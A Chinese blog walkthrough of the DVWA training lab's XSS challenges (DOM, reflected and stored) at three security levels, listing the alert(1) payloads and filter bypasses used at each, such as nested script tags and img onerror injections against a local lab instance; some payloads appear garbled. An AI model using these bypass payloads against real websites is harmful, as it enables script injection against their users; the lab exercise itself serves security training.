首页 > 其他分享 >DVWA靶场通关-XSS

DVWA靶场通关-XSS

时间:2023-09-18 15:11:07浏览次数:39  
标签:XSS name DOM default DVWA alert SQL 靶场

Brute Force(暴力(破解))、Command Injection(命令行注入)、CSRF(跨站请求伪造)、         File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA (不安全的验证码)、       SQL Injection(SQL注入)、SQL Injection(Blind)(SQL盲注)、XSS(DOM)(基于DOM树)、       XSS(Reflected)(反射型跨站脚本)、XSS(Stored)(存储型跨站脚本)

XSS(DOM)(基于DOM树)

等级low

<script>alert(1)</script>

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(1)%3C/script%3E

Medium

过滤了<script 标签

<img src=# one rror=alert(1)>

F12看前端代码,CTRL+F查看default

需要闭合</select>

</select><img src=# one rror=alert(1)>

等级high

#<script>alert(1)</script>

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English#%3Cscript%3Ealert(1)%3C/script%3E

 

XSS(Reflected)(反射型跨站脚本)

low

?name=<script>alert(1)</script>#

Medium

将<script>标签替换为空

<scr<script>ipt>alert(1)</script>

high

对<script>使用了正则表达式替换

<img src=1 οnerrοr=alert(1)>

 

XSS(Stored)(存储型跨站脚本)

low

<script>alert(1)</script>

 F12看前端代码,CTRL+F查看name

 

点击

Medium

 $name = str_replace( '<script>', '', $name );     将<script>标签替换为空

<scri<script>pt>alert(1)</script>

high

<img src=1 one rror=alert(1)>

 

 

翻译

搜索

复制

<iframe></iframe>

标签:XSS,name,DOM,default,DVWA,alert,SQL,靶场
From: https://www.cnblogs.com/TinKode123/p/17711890.html

相关文章

  • DVWA靶场通关- SQL Injection(SQL注入)
    BruteForce(暴力(破解))、CommandInjection(命令行注入)、CSRF(跨站请求伪造)、     FileInclusion(文件包含)、FileUpload(文件上传)、InsecureCAPTCHA(不安全的验证码)、    SQLInjection(SQL注入)、SQLInjection(Blind)(SQL盲注)、XSS(DOM)(基于DOM树)、    XSS(Reflec......
  • HTTP安全响应头配置之X-XSS-Protection
    目的首先我们来理解一下什么是“X-XSS-Protection”,从字面意思上看,就是浏览器内置的一种XSS防范措施。没错,这是HTTP的一个响应头字段,要开启很简单,在服务器的响应报文里加上这个字段即可。浏览器接收到这个字段则会启用对应的XSS防范模块。这个header主要是用来防止浏览器中的......
  • DVWA靶场通关-Insecure CAPTCHA (不安全的验证码)
    BruteForce(暴力(破解))、CommandInjection(命令行注入)、CSRF(跨站请求伪造)、     FileInclusion(文件包含)、FileUpload(文件上传)、InsecureCAPTCHA(不安全的验证码)、    SQLInjection(SQL注入)、SQLInjection(Blind)(SQL盲注)、XSS(DOM)(基于DOM树)、    XSS(Reflec......
  • DVWA靶场通关-File Upload(文件上传)
    BruteForce(暴力(破解))、CommandInjection(命令行注入)、CSRF(跨站请求伪造)、     FileInclusion(文件包含)、FileUpload(文件上传)、InsecureCAPTCHA(不安全的验证码)、    SQLInjection(SQL注入)、SQLInjection(Blind)(SQL盲注)、XSS(DOM)(基于DOM树)、    XSS(Reflec......
  • DVWA靶场通关-CSRF(跨站请求伪造)
    BruteForce(暴力(破解))、CommandInjection(命令行注入)、CSRF(跨站请求伪造)、     FileInclusion(文件包含)、FileUpload(文件上传)、InsecureCAPTCHA(不安全的验证码)、    SQLInjection(SQL注入)、SQLInjection(Blind)(SQL盲注)、XSS(DOM)(基于DOM树)、    XSS(Reflec......
  • DVWA靶场通关-Command Injection(命令行注入)
    BruteForce(暴力(破解))、CommandInjection(命令行注入)、CSRF(跨站请求伪造)、     FileInclusion(文件包含)、FileUpload(文件上传)、InsecureCAPTCHA(不安全的验证码)、    SQLInjection(SQL注入)、SQLInjection(Blind)(SQL盲注)、XSS(DOM)(基于DOM树)、    XSS(Reflec......
  • DVWA靶场环境搭建+Phpstudy配置
    1、DVWA介绍在近些年网络安全的高速发展中,初学者已经很难找到一个网站进行渗透了,曾几何时,一个漏洞,一个工具就可以在网上找到很多有漏洞的网站去体验,当然渗透一个未经授权的系统是非法的。因此,为了能够较为真实地学习Web渗透的各种技术,就需要找一个专门用于学习的Web演练平台,人们......
  • HTB-vaccine靶场练习
    靶机地址:10.129.198.90端口扫描nmap-sC-A10.129.198.90扫描后,得到端口21,22,80,操作系统为Ubuntu,21端口为ftp协议可以进行匿名登录,且存在文件backup.zip,和一些路由信息使用匿名用户登录ftp,帐号anonymous,密码为空dir查看当前目录下的文件使用get下载文件使用unzip......
  • linux DVWA 文件上传之 Security level set to high
    --总体步骤1、生成图片木马2、上传图片木马3、通过文件包含执行图片马一、生成图片木马1、随便准备一张图片——football.png2、test.php写入内容:<?php@eval($_GET['x']);?>3、生成图片木马,命令行执行:catfootball.pngtest.php>>my.png二、把DVWA的安全级别......
  • XSS学习之路
    alert():警告弹窗confirm():确定弹窗prompt():提示弹窗payload关键字测试:onfocus<script><ahref=javascript:alert()>'sRcDaTaOnFocusOnmOuseOverOnMouseDoWnP<sCriPt><ahReF=javascript:alert()>;&arg02="'sRcDaTaOnFocusOnmO......